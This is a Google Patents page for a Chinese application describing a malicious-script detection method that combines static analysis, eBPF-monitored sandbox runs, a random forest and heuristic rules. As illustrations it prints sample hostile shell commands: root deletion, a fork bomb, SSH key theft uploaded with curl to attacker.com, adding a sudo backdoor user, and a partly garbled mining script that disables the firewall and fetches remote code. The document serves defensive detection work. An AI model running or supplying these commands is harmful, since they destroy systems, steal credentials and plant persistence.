[go: up one dir, main page]

CN119397533A - Malicious script detection method, device, equipment and storage medium - Google Patents

Malicious script detection method, device, equipment and storage medium Download PDF

Info

Publication number
CN119397533A
CN119397533A CN202411486314.7A CN202411486314A CN119397533A CN 119397533 A CN119397533 A CN 119397533A CN 202411486314 A CN202411486314 A CN 202411486314A CN 119397533 A CN119397533 A CN 119397533A
Authority
CN
China
Prior art keywords
malicious
script
risk assessment
behavior
result
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202411486314.7A
Other languages
Chinese (zh)
Inventor
翁迟迟
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Beijing QIYI Century Science and Technology Co Ltd
Original Assignee
Beijing QIYI Century Science and Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Beijing QIYI Century Science and Technology Co Ltd filed Critical Beijing QIYI Century Science and Technology Co Ltd
Priority to CN202411486314.7A priority Critical patent/CN119397533A/en
Publication of CN119397533A publication Critical patent/CN119397533A/en
Pending legal-status Critical Current

Links

Classifications

    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection
    • G06F21/563Static detection by source code analysis
    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F18/00Pattern recognition
    • G06F18/20Analysing
    • G06F18/22Matching criteria, e.g. proximity measures
    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/566Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F2221/00Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F2221/03Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
    • G06F2221/033Test or assess software

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Theoretical Computer Science (AREA)
  • General Engineering & Computer Science (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Health & Medical Sciences (AREA)
  • Virology (AREA)
  • General Health & Medical Sciences (AREA)
  • Data Mining & Analysis (AREA)
  • Evolutionary Computation (AREA)
  • Life Sciences & Earth Sciences (AREA)
  • Artificial Intelligence (AREA)
  • Bioinformatics & Cheminformatics (AREA)
  • Evolutionary Biology (AREA)
  • Computer Vision & Pattern Recognition (AREA)
  • Bioinformatics & Computational Biology (AREA)
  • Storage Device Security (AREA)

Abstract

本申请涉及一种恶意脚本的检测方法、装置、设备及存储介质,本方案不仅可通过对脚本文本的分析生成静态分析结果,还可根据目标脚本在运行过程中的操作事件生成动态分析结果,并通过机器学习模型及启发式规则集确定综合风险评估结果。通过该方式,使得目标脚本在运行过程中执行的恶意行为可被发现,因此本方案可有效的检测新型恶意脚本;并且,本方案通过沙箱容器运行目标脚本,可提高恶意脚本的检测效率。

The present application relates to a method, device, equipment and storage medium for detecting malicious scripts. The present solution can not only generate static analysis results by analyzing the script text, but also generate dynamic analysis results based on the operation events of the target script during operation, and determine the comprehensive risk assessment results through machine learning models and heuristic rule sets. In this way, the malicious behavior executed by the target script during operation can be discovered, so the present solution can effectively detect new malicious scripts; and the present solution can improve the detection efficiency of malicious scripts by running the target script in a sandbox container.

Description

Malicious script detection method, device, equipment and storage medium
Technical Field
The present application relates to the field of malicious script detection, and in particular, to a method, an apparatus, a device, and a storage medium for detecting a malicious script.
Background
With the development of the internet, network security has become one of the most critical problems in the internet era, and malicious scripts have become a main means of network attack in recent years. The malicious script is a script for performing unauthorized operations or destroying a system, and the conventional malicious script detection technology often depends on a known malicious script feature library, so that the unknown or modified malicious script is difficult to effectively detect. Moreover, with the continuous development of hacking technology, malicious script forms are more and more diversified, and the traditional detection means are difficult to deal with, so that the phenomenon of missing report often occurs.
Therefore, how to accurately detect the malicious script is a problem that needs to be solved by those skilled in the art.
Disclosure of Invention
The application provides a method, a device, equipment and a storage medium for detecting a malicious script, which are used for accurately detecting the malicious script.
In a first aspect, the present application provides a method for detecting a malicious script, including:
Acquiring a target script to be analyzed;
performing text analysis on the target script to generate a static analysis result;
operating the target script through a sandbox container, acquiring an operation event of the target script in the operation process, and generating a dynamic analysis result according to the operation event;
Extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk assessment result;
Matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
and determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
In a second aspect, the present application provides a detection apparatus for malicious scripts, including:
The first acquisition module is used for acquiring a target script to be analyzed;
the first analysis module is used for carrying out text analysis on the target script and generating a static analysis result;
The second acquisition module is used for operating the target script through the sandbox container and acquiring an operation event of the target script in the operation process;
the second analysis module is used for generating a dynamic analysis result according to the operation event;
the first evaluation module is used for extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk evaluation result;
the second evaluation module is used for matching the operation behaviors in the dynamic analysis results through a heuristic rule set to determine a second risk evaluation result;
and the result determining module is used for determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
In a third aspect, the present application provides an electronic device, comprising:
The computer program comprises a processor, a memory and a computer program which is stored in the memory and can run on the processor, wherein the processor executes the steps of the method for detecting the malicious script through the computer program.
In a fourth aspect, the present application provides a computer storage medium storing computer-executable instructions for performing the steps of the above-described malicious script detection method.
Compared with the prior art, the technical scheme provided by the embodiment of the application has the advantages that the malicious script detection scheme is provided, the static analysis result can be generated through analysis of the script text, the dynamic analysis result can be generated according to the operation event of the target script in the running process, and the comprehensive risk assessment result is determined through the machine learning model and the heuristic rule set. By the method, malicious behaviors executed by the target script in the running process can be found, so that the novel malicious script can be effectively detected, and the detection efficiency of the malicious script can be improved by running the target script through the sandbox container.
Drawings
The accompanying drawings, which are incorporated in and constitute a part of this specification, illustrate embodiments consistent with the invention and together with the description, serve to explain the principles of the invention.
In order to more clearly illustrate the embodiments of the invention or the technical solutions of the prior art, the drawings which are used in the description of the embodiments or the prior art will be briefly described, and it will be obvious to a person skilled in the art that other drawings can be obtained from these drawings without inventive effort.
One or more embodiments are illustrated by way of example and not limitation in the figures of the accompanying drawings, in which like references indicate similar elements, and in which the figures of the drawings are not to be taken in a limiting sense, unless otherwise indicated.
FIG. 1 is a flow chart of a method for detecting a malicious script according to an embodiment of the present application;
FIG. 2 is a flowchart of another method for detecting a malicious script according to an embodiment of the present application;
FIG. 3 is a flowchart illustrating another method for detecting a malicious script according to an embodiment of the present application;
fig. 4 is a schematic structural diagram of a detection device for malicious scripts according to an embodiment of the present application;
Fig. 5 is a schematic structural diagram of an electronic device according to an embodiment of the present application.
Detailed Description
The malicious script refers to any script that is added, changed, or deleted from the software system for the purpose of creating a hazard or impairing the system function, and is described herein by taking the following common malicious script as an example.
Script one:
Bash
#!/bin/bash
rm-rf/
when the script is executed, all files and directories under the root directory are deleted recursively, so that the system cannot operate, and the risk is extremely high.
Script II:
Bash
:(){:|:&};:
The second script is a Fork bomb, which is an attack method for exhausting system resources by using recursive call. When the script is executed, the number of system processes is increased rapidly until all system resources are exhausted, so that the system crashes and the risk is high.
Script III:
Bash
#!/bin/bash
tar-czf/tmp/ssh_keys.tar.gz~/.ssh
curl-F′file=@/tmp/ssh_keys.tar.gz′http://attacker.com/upload
the third scenario steals the SSH (Secure Shell protocol) key of the user and sends the SSH key to the server of the attacker. When the script is executed, the SSH key of the user is revealed, so that the user account is controlled by an attacker, and the risk is high.
Script IV:
Bash
#!/bin/bash
useradd-m backdoor-s/bin/bash
echo′backdoor:password'|chpasswd
usermod-aG sudo backdoor
the fourth script adds a back door user in the system, gives sudo (super user do, authorized ordinary user execute administrator command) authority, and after executing the script, an attacker can obtain complete control authority of the system through the back door user, so that the risk is high.
It should be noted that, the traditional malicious script detection means depends on the known malicious script feature library, so that the novel malicious script cannot be effectively detected, and along with the continuous development of hacking technology, the malicious script is smaller and smaller, the propagation speed is high, the variety of the malicious script is rich, and the traditional safety protection means is difficult to deal with in time, so that the phenomenon of missing report occurs.
Therefore, the present embodiment provides a method, an apparatus, a device, and a storage medium for detecting a malicious script, so as to accurately detect the malicious script.
For the purpose of making the objects, technical solutions and advantages of the embodiments of the present application more apparent, the technical solutions of the embodiments of the present application will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present application, and it is apparent that the described embodiments are some embodiments of the present application, but not all embodiments of the present application. All other embodiments, which can be made by those skilled in the art based on the embodiments of the application without making any inventive effort, are intended to be within the scope of the application.
The following disclosure provides many different embodiments, or examples, for implementing different structures of the invention. In order to simplify the present disclosure, components and arrangements of specific examples are described below. They are, of course, merely examples and are not intended to limit the invention. Furthermore, the present invention may repeat reference numerals and/or letters in the various examples. This repetition is for the purpose of simplicity and clarity and does not in itself dictate a relationship between the various embodiments and/or configurations discussed.
Referring to fig. 1, fig. 1 is a schematic flow chart of a method for detecting a malicious script according to an embodiment of the present application, where the method includes the following steps:
S101, acquiring a target script to be analyzed;
The method comprises the steps of firstly deploying an analysis engine of a malicious script on a cloud platform before executing the method, configuring a cloud native cluster environment, and particularly comprises the steps of configuring the cluster environment, deploying a micro-service component, preparing a sandbox container and deploying an event acquisition program, wherein when the cluster environment is configured, the distributed cluster can be configured by using Kubernetes, deployment parameters are set, the deployment parameters comprise the number of nodes, the resource configuration of each node and the network configuration, the minimum node number is set to be 3, the resource configuration of each node is set to be an 8CPU (Central Processing Unit ) core, a 16GB RAM (Random Access Memory, random access memory), and the network is set to be a 10Gbps internal network. The micro service component deployed in this embodiment is used to execute a malicious script detection method, including a task scheduling service, a load balancing service, a sandbox execution service, a behavior monitoring service, a result analysis service, a result aggregation service, and the like, where each service may use gRPC (Google Remote Procedure Call, remote procedure call framework) protocol communication, so as to ensure low latency and high throughput.
When preparing the sandbox container, it is first necessary to create the sandbox container, for example, a lightweight Linux distribution (such as Alpine Linux) may be used to create the sandbox container and configure the container, where the configuration of the container in this embodiment specifically includes a CPU constraint of 2 cores, a memory constraint of 4GB, a disk space of 10GB, a network NAT (Network Address Translation ) mode, and an egress traffic constraint of 5Mbps. Secondly, environmental simulation is needed, including randomly generating system information, simulating common system services, implanting bait files (honeypot technology), etc., wherein the system information includes hostname, IP (Internet Protocol ) address, etc., the system services include ssh (Secure Shell) service, cron service, etc., and the bait files include fake system logs and fake user data.
Finally, setting script execution process including setting assigned interpreter running script and execution parameters, wherein the interpreter may be flash (Bourne AgainSHell, command line interpreter) and python, and the execution parameters include timeout time and resource limit parameters, in this embodiment, timeout time may be set according to priority of script, defaulting to 5 minutes, CPU utilization up to 80% and memory up to 3GB.
In this embodiment, the sandboxed container obtains the operation event through the event obtaining program when running the target script, and the present embodiment may obtain the operation event using eBPF (Extended Berkeley PACKET FILTER, kernel programming technique) mechanism. The proposal needs to compile and load the self-defined eBPF program into the sandbox container kernel and set a monitoring point for acquiring the operation event, in the embodiment, the monitoring point is a system call event, such as open (file opening), read (data reading), write (data writing), connect (connection), execve (call), etc., a file operation event, such as creating, modifying and deleting the file, a network activity event, such as TCP (Transmission Control Protocol )/UDP (User Datagram Protocol, network transmission protocol) connection, data transmission, a process management event, such as fork (creation process), clone (creation process), exit (termination process), and the application can also configure an event filter to reduce the collection of irrelevant data.
Specifically, when a user submits an analysis task, the user can submit a request to be analyzed through an API (Application Programming Interface ) or an interface, after receiving the analysis request through the API, the system obtains parameters carried by the analysis request, including a script file, an analysis priority and a timeout time, where the script to be analyzed is called a target script, the priority includes high, medium and low, the analysis priority can determine the analysis order of each target script, and the higher the priority is, the earlier the analysis order is.
After the target scripts are obtained, the embodiment also needs to generate a unique task ID (unique identifier) of each target script, wherein the ID can be in a UUID (Universally Unique Identifier) format, and record task metadata comprising task submission time, target script file hash and file type identification, wherein the file hash can be calculated through an SHA256 algorithm, and the file type can be identified by using a libmagic library. And when tasks are distributed, the tasks are distributed to each node in a weighted polling (Weighted Round Robin) mode, so that load balance of each node is ensured, wherein factors influencing the weights comprise the current CPU load, the available memory and the recent task completion rate of each node, and the higher the recent task completion rate is, the higher the weight is.
S102, performing text analysis on the target script to generate a static analysis result;
In this embodiment, the script code may be JavaScript (programming language), VBScript (Visual Basic Script, scripting language), etc., and before static analysis is performed on the target script, initial preprocessing is first required to perform operations of removing comments and formatting codes on the input code of the target script, where removing comments refers to deleting comment lines in the code, and formatting codes refers to removing unnecessary spaces and line-boxes, standardizing code formats, and facilitating subsequent analysis.
After the preprocessed script codes are obtained, static analysis can be performed on the text. The purpose of the static analysis is to extract potentially dangerous features in the target script, which may include at least one of obfuscated code segments, encrypted code segments, commands, functions, strings, and constants, and is not specifically limited herein. In identifying potentially dangerous features, the potentially dangerous features may be identified by a preset database, regular expression, etc., which are not particularly limited herein.
S103, running a target script through the sandbox container, acquiring an operation event of the target script in the running process, and generating a dynamic analysis result according to the operation event;
In this embodiment, the sandbox container is specifically a dock (open-source application container engine) container, and quick start and low resource occupation can be achieved by using the dock container, so that a large number of concurrent script analysis requests can be effectively processed, and the sandbox is lighter and more efficient than the traditional virtual machine sandbox. In addition, in the process of running the target script through the sandboxed container, all operation events of the target script can be comprehensively monitored through a eBPF mechanism, wherein eBPF allows user-defined codes to be safely and efficiently executed in a Linux kernel. By mounting eBPF programs onto specific kernel hooks, events within the system, such as system call events, network activity events, file operation events, process management events, etc., can be captured and processed in real time. A lightweight and high-performance event capturing mechanism is provided for sandbox analysis, so that malicious behaviors are ensured not to be missed.
It should be noted that, in the dynamic analysis in this embodiment, the dangerous behavior is identified by the operation event of the target script in the operation process, so after the operation event of the target script in the operation process is obtained, whether the malicious operation behavior exists in the operation event can be primarily analyzed, if the operation event is identified to have a log deletion event and a firewall forbidden attempt event, it is illustrated that the target script tries to execute the two malicious operation behaviors of the log deletion and the firewall forbidden attempt in the operation process, and relevant information of the malicious operation behavior is recorded to generate a dynamic analysis result.
S104, extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting the feature vectors into a machine learning model to obtain a first risk assessment result;
In this embodiment, the machine learning model is used for preliminary classification of the extracted feature vectors. The machine learning model can be specifically a random forest model, wherein the random forest is an integrated learning method, and classification tasks are realized by constructing a plurality of decision trees. This has the advantage of robustness to noisy data and processing power for high dimensional data. Before using the random forest model, the random forest model needs to be trained using a large amount of annotation data, wherein the annotation data contains the behavior features of normal and malicious scripts.
Specifically, the embodiment needs to extract feature vectors from a static analysis result and a dynamic analysis result, wherein features to be extracted from the static analysis result include command call and character string constant, features to be extracted from the dynamic analysis result include a system call sequence, file operation frequency, network connection times, a process creation mode and the like, and the scheme can also set weights and dimensions of each feature type, for example, if the feature vector dimension of each sample is 500, the extracted command call features occupy 100 dimensions, and the system call sequence occupies 200 dimensions and the like. After the feature vector is obtained, the extracted feature vector is further required to be normalized, so that all features are ensured to be in the same scale range, such as 0-1, and the normalization method can be Min-Max normalization, Z-score normalization and the like. The normalized feature vectors can be input into a random forest model, the random forest model inputs the feature vectors into each tree, and the prediction results of each tree are synthesized to carry out a first risk assessment result.
The first risk assessment result can comprise a malicious probability score or a malicious grade output by a random forest model and a classification result preliminarily judged according to the malicious probability, wherein the malicious probability score can be set between 0 and 1, for example, after a feature vector of a target script is input into the model, the malicious probability score is output to be 0.75, and the probability of 75% of the behavior is malicious. And the application can also set a classification threshold value for preliminarily judging whether the script is malicious or not, if the classification threshold value is set to be 0.7, the script is considered to be malicious when the probability score is greater than 0.7, otherwise, the script is considered to be non-malicious.
S105, matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
In this embodiment, the dynamic analysis result includes primarily identified operation behaviors, and the heuristic rule set is set with rules for identifying malicious operation behaviors, so in this embodiment, the malicious operation behaviors can be identified by further evaluating the target script in operation through the heuristic rule set and the rules in the heuristic rule set. After the malicious operation behaviors are identified, the risk assessment result can be determined according to the number of the malicious operation behaviors, the importance degree of the malicious operation behaviors and other factors, and the risk assessment result can be a matching score or a risk grade, and is not particularly limited, so long as the risk degree can be reflected.
The rules in the heuristic rule set comprise that the system log is deleted, the score=0.8, the security software is disabled, the score=0.7, and if the target script is detected to execute malicious operation, the system log is deleted, the security software is disabled, the risk assessment result is 0.8+0.7=1.5.
S106, determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
In this embodiment, the comprehensive risk assessment result is determined by combining the first risk assessment result of the machine learning model and the second risk assessment result of rule matching, so as to more accurately assess the overall risk. The setting of different weights may balance the effect of both on the final score.
Specifically, when the comprehensive risk assessment result is determined according to the first risk assessment result and the second risk assessment result, the determination mode of the comprehensive risk assessment result can be determined according to the types of the first risk assessment result and the second risk assessment result, if the first risk assessment result is a malicious grade and the second risk assessment result is a dangerous grade, the comprehensive risk assessment result is determined according to the two grades, if the first risk assessment result is a high malicious grade and the second risk assessment result is a high dangerous grade, the comprehensive risk assessment result is that the target script has high risk. Similarly, if the first risk assessment result is a malicious probability score and the second risk assessment result is a matching score, the comprehensive risk assessment result determined according to the two grades is a total score obtained by weighting the malicious probability score and the matching score, namely the comprehensive risk score.
In summary, it can be seen that when the malicious script is detected, the scheme can generate a static analysis result through analysis of the script text, generate a dynamic analysis result according to an operation event of the target script in the running process, and determine a comprehensive risk assessment result through a machine learning model and a heuristic rule set. By the method, malicious behaviors executed by the target script in the running process can be found, so that the novel malicious script can be effectively detected, and the detection efficiency of the malicious script can be improved by running the target script through the sandbox container.
Based on the embodiment, the process of generating the static analysis result by text analysis of the target script specifically comprises the steps of text analysis of the target script, identification of target code segments in the target script, and recording of code information and positions of each target code segment, wherein the types of the target code segments comprise at least one of confusion code segments, encryption code segments, commands, functions, character strings and constants.
Specifically, the object code segment is a code segment used to analyze potential threats, and the types of the code segment include a obfuscated code segment, an encrypted code segment, a command, a function, a character string, and a constant, and the code information includes information related to the object code segment such as a type of the object code segment, an obfuscated type tag, an encrypted type tag, a potentially dangerous call, and the like.
This is illustrated by the following steps:
1. Identifying potentially confusing code segments or encrypted code segments:
After the script code of the preprocessed target script is obtained, the potential features in the script are required to be extracted, and the embodiment specifically comprises character string features, control flow features and variable features, wherein the character string features are features such as long character strings, base64 codes, hexadecimal codes and the like in the script code, the control flow features are complex control flow structures such as a large number of if-else nesting, circulation and the like in the script code, and the variable features are a large number of unused variables or suspected confusion variable names in the script code, and the confusion variable names are randomly generated variable names. The embodiment specifically may identify the threshold value of the long string through string_threshold, and identify the threshold value of the complexity of the control flow through complexity _threshold, which is not specifically limited herein. By extracting the above features, a set of feature vectors may be generated that identify code segments that may be confused or encrypted.
Secondly, the embodiment can analyze the feature vectors and the script codes through a predefined known pattern library and a regular expression to identify possible confusion patterns or encryption patterns; in this embodiment, the known pattern library (pattern_library) contains patterns of common confusion techniques (such as character substitution, character string concatenation, eval function call, etc.). Regular expressions (regex_patterns) are a collection of regular expressions used to match common confusion approaches, primarily for string features, which can be used to match known encryption or confusion patterns. After the matching, the matched mode information can be generated, wherein the mode information comprises the matched code segment positions, the corresponding confusion type labels and encryption type labels.
Further, after the code segments and the corresponding type labels after the pattern matching are obtained, possible encrypted segments can be further identified through the modes of character string decoding, decryption function identification, dynamic feature simulation and the like. The character string decoding is used for decoding the matched base64 or hex code character string, checking whether the decoded character string accords with code characteristics, wherein the code characteristics can be executable codes, the decryption function identification is used for identifying common decryption function calls (such as AES decryption) through pattern matching and tracking input parameters of the decryption function calls, and the dynamic characteristic simulation is used for performing partial simulation execution on suspicious paragraphs and judging whether new code fragments can be generated in the decryption process. The present embodiment may set the maximum decoding attempt number through the decoder_ attempts, and set the common decryption function mode using decryption _patterns. After the encryption code segment is identified in the mode, the encryption type label can be output and the position of the encryption type label can be recorded.
And finally, identifying the confusion code section and the encryption code section of the target script, and the type label and the position of each code section through the steps, and generating a final analysis report, wherein the content in the analysis report is a part of the static analysis result. In this embodiment, the output format of the tag may be specified by output_format, which may be JSON (JavaScript Object Notation ) or XML (extensible markup language (Extensible Markup Language)), and in the analysis report, classification tags may be output in JSON or XML format, to identify the feature and confusion type and encryption type of each code segment, and to precisely record the position of each suspicious code segment, such as line number, character range, and so on.
For example, if the target script is a JavaScript script including a base64 code, the script code is as follows:
JavaScript
var encodedString=
"ZnVuY3Rpb24gdGVzdCgpe2FsZXJ0KCJIZWxsbyBXb3JsZCEiKTt9";
eval(atob(encodedString));
the scheme performs the following steps when identifying potentially confusing code segments or encrypted code segments:
1.1, removing notes and formatting codes in the codes to obtain pure codes.
1.2, Extracting features, and identifying a base64 coding character string and eval call.
1.3 Matching to base64 coding pattern using regular expressions.
1.4, Decoding the base64 character string and identifying that the character string contains function call features.
1.5, Outputting a type tag, identifying an eval call and an encrypted segment, and outputting the following result:
JSON
{
"code_segment":"eval(atob(encodedString));",
"tag":"Potentially Encrypted Code",
"position":"Line 2,Characters 1-32"
}
2. Identifying a command, a function:
In this embodiment, it is possible to determine which commands are legal and which may be dangerous by scanning the commands and function calls in the script and comparing them to a database of known commands/functions. The commands of rm-rf, ufw disable, userdel, etc. may be marks of malicious behaviors of the script, and after comparison, the commands and functions used in the target script can be output, and potentially dangerous calls, such as system commands, network operation functions, etc., are marked.
If the target script is an ore excavation script:
Bash
#!/bin/bash
rm-rf/var/log/syslog# purge log
Ufw disable # shutdown firewall
Userdel vfinder # unloading EDR
USB/local/qcloud/YunJing/uninst. Sh# offload EDR
Wget/salt-store http://416419.Selcdn. Ru/cdn/salt_ storer # download binary
echo"*****$LDR http://217.8.117.`37/c.sh|sh>dev/null 2&1"
Implant timing task
cat"$SSH_KEY_FILE">>~/.ssh/authorized_keys
After scanning the mining script, the following dangerous commands are found in the script:
rm-rf/var/log/syslog-clear system log, attempt to hide its activity.
Ufw disable closing the firewall and exposing the system.
Userdel and/usr/local/qcloud/YunJing/uninst. Sh. Uninstall possible security software.
Wget downloading malicious software.
Crontab, implantation timing task.
3. Identifying strings and constants
In this embodiment, it is necessary to extract the character strings and constants in the script, and perform pattern matching and feature extraction with the character string matching rule base, and the identified sensitive character strings and constant information in the target script, such as a hard-coded path, an IP address, a URL, and the like.
In the mine excavation script, the following contents are extracted:
URL http://416419.Selcdn. Ru/cdn/salt_ storer, which may be a remote server for downloading malicious binary files.
The IP address http://217.8.117.37/c.sh is used for timing the remote script executed.
SSH key file paths SSH/authenticated_keys may be used for rights promotion.
The method and the device can identify the confusion code segment or the encryption code segment in a static analysis mode, perform pattern matching and decoding attempt by utilizing the text characteristics of the codes, do not need to actually execute the codes, ensure the safety of an analysis process, quickly identify common confusion technology through characteristic extraction and pattern matching, further deeply analyze potential encryption segments through character string decoding and decryption function identification, ensure high accuracy, and further identify potential dangerous commands in a target script and character strings and constants for executing dangerous operations through extracting commands, functions, character strings and constants.
Referring to fig. 2, fig. 2 is a flowchart of another method for detecting a malicious script according to an embodiment of the present application, where the method includes the following steps:
s201, acquiring a target script to be analyzed;
s202, performing text analysis on a target script to generate a static analysis result;
S203, running a target script through a sandbox container, and acquiring an operation event of the target script in the running process through a eBPF mechanism of the sandbox container, wherein the operation event comprises a system call event, a network activity event, a file operation event and a process management event;
s204, identifying malicious operation behaviors in the operation event;
S205, matching the operation event sequence in the sliding window with a malicious behavior pattern, and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold;
s206, searching a second malicious operation behavior sequence meeting a malicious time sequence mode according to the time interval of each operation event;
S207, extracting feature vectors from a static analysis result and a dynamic analysis result, and inputting a machine learning model to obtain a first risk assessment result, wherein the dynamic analysis result comprises a malicious operation behavior, a first malicious operation behavior sequence and a second malicious operation behavior sequence;
S208, matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
S209, determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
Specifically, during the execution of the target script within the container, the operational events are obtained using the eBPF Trace mechanism. The operation events acquired in this embodiment include a system call event, a network activity event, a file operation event, and a process management event, which are described herein separately:
1.1, acquiring a system call event:
Before acquiring the system call event, eBPF programs need to be added to the system call tracking points, such as __ x64_sys_ execve, and if the BPF program captures the system call related to the script, event processing is triggered, and information such as script paths, execution parameters, process IDs and the like is recorded. Specifically, in the execution process of the target script, a system call monitoring tool is used for recording all system calls in the execution process of the script, and a system call log is generated, wherein the log comprises each system call event, the execution sequence, parameters, call results and the like of each system call event.
1.2, Acquiring network activity events:
In this embodiment, a eBPF program is required to capture a network socket operation, and generate a network activity event, where an external IP address, a port number, a hash of transmission data content, and the like of the network activity are recorded, where the network socket operation includes tcp_connect, tcp_sendmsg, and the like, where the traffic analysis tool may be Wireshark, and where a condition for acquiring the network activity event may be set that when the network request is connected to the external address or a common mining pool IP is involved, a corresponding network activity event is generated.
1.3, Acquiring file operation events:
In this embodiment, a eBPF program needs to be pre-installed to a file operation hook such as a vfs_write (write file) and a vfs_read (read file), a file operation event is generated by monitoring file read/write operation of a record script through a file system, the file operation event includes a path, an operation type, a file content hash value and the like of a target script read or write file, the file read/write operation can be monitored specifically through an inotify, the operation type includes CREATE, DELETE and the like, and conditions for acquiring the operation event can be set, for example, an operation event that only the file operation involves a sensitive directory or a specific file extension is set, the sensitive directory can be per etc., the specific file extension can be per, per var and the like, and a large number of security events can be filtered.
1.4, Acquiring a process management event;
In this embodiment, the process monitoring tool is required to periodically record the process tree changes generated during script execution, generate a process management event, where the event includes the generation and termination of a sub-process, and record the PID (Process Identifier, process controller), parent-child relationship, and start command of each process. For example, if the script generates a large number of sub-processes, and these processes are consistent with known mine excavation process characteristics, the suspicion increases. The monitoring tool can be ps, pstree and the like, and the condition for acquiring the network activity event can be set as that the new process inherits the process ID or the user ID of the suspicious script.
In this embodiment, when a dynamic analysis result is generated according to an operation event, a malicious operation behavior of the operation event may be specifically identified by the following manner:
2.1, identifying malicious operation behaviors in the operation event.
In the present embodiment, the malicious operation behavior is a typical malicious operation performed in the execution process of the malicious script, such as log deletion, SSH key operation, and the like. These actions are accomplished by analyzing the captured system call events and related events and matching them to known malicious patterns. In this embodiment, the malicious operation behavior may include log deletion behavior, firewall disabling attempt behavior, user deletion behavior, suspicious software uninstallation behavior, external file download behavior, timed task modification behavior, SSH key operation behavior, and the like.
Specifically, when log deletion behavior is identified, files related to the system log need to be monitored and deleted, file deletion system call is tracked through eBPF, and identification parameters are that unlink or unlinkat call is matched, and the path of the target file contains/var/log. When the firewall disabling attempt behavior is identified, the system call for modifying the iptables and ufw configuration needs to be captured, relevant command line parameters such as iptables-F are extracted, and the identification parameters are that the system call containing the iptables or ufw keywords is captured. When identifying user deletion behavior, it is necessary to monitor system calls related to user management, such as userdel, and then extract parameters related to user deletion in the command line, such as capture system calls containing userdel or deluser. When suspicious software uninstallation behavior is identified, system calls of an execution software package manager (such as apt-get remove and yum remove) need to be tracked, whether known security software is contained in command line parameters is checked, and the identification parameters are that command execution of the software package manager is matched and security software packages are involved.
When the external file downloading behavior is identified, network activities and file writing operations are required to be captured, files are downloaded through tools such as wget, curl and the like, the downloaded URL, file name, hash value and the like are recorded, and identification parameters are that the association between network socket connection and file writing operation is captured. When identifying the timing task modification behavior, the pair/etc/crontab needs to be monitored,
Modification of timing task files such as/var/spool/cron/crontabs, capturing system calls related to the timing task configuration files such as open and write, and identifying parameters such as matching system calls for accessing or modifying cron related files. When the SSH key operation behavior is identified, the read-write operation of the files in the/. SSH/directory needs to be tracked, file operation system call is captured, the path related to the SSH key file is recorded, and the identification parameters are that the file operation system call related to the SSH directory is matched.
2.2, Matching the operation event sequence in the sliding window with a malicious behavior pattern, and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold value.
In this embodiment, the first malicious operation behavior sequence is identified by a context correlation analysis method. The contextual relevance analysis uses a sliding window technique to analyze the most recently occurring events in the time dimension, and by applying predefined behavior pattern matching rules, the system can detect complex malicious behavior patterns and compare them to known threats.
Specifically, before the context correlation analysis method is executed, a window size needs to be set first, for example, the last 100 system call events, the sequence and type of events in the sliding window are recorded for subsequent analysis, the window slides and updates each time a new event is captured, and old events are moved out of the window. When a first malicious operation behavior sequence is identified, a behavior pattern matching rule is firstly required to be set, the behavior pattern matching rule is a predefined rule combination, for example, an external file downloading mode, a timing task modifying mode and a firewall disabling mode, then event sequences in each sliding window are matched with malicious patterns in a rule base, when events in the sliding window match a certain rule, the event sequences are marked as potential threats, then similarity comparison is carried out on the current behavior sequence with the potential threats and the known threats, a similarity score is calculated, and when the score is higher than a certain threshold value, an alarm is triggered, and the current behavior sequence is used as the first malicious operation behavior sequence. In this embodiment, a similarity algorithm such as Jaccard may be used to compare the current behavior sequence with the known threat behavior patterns, and the similarity threshold is set to 0.7, so as to ensure a higher detection rate and a lower false alarm rate.
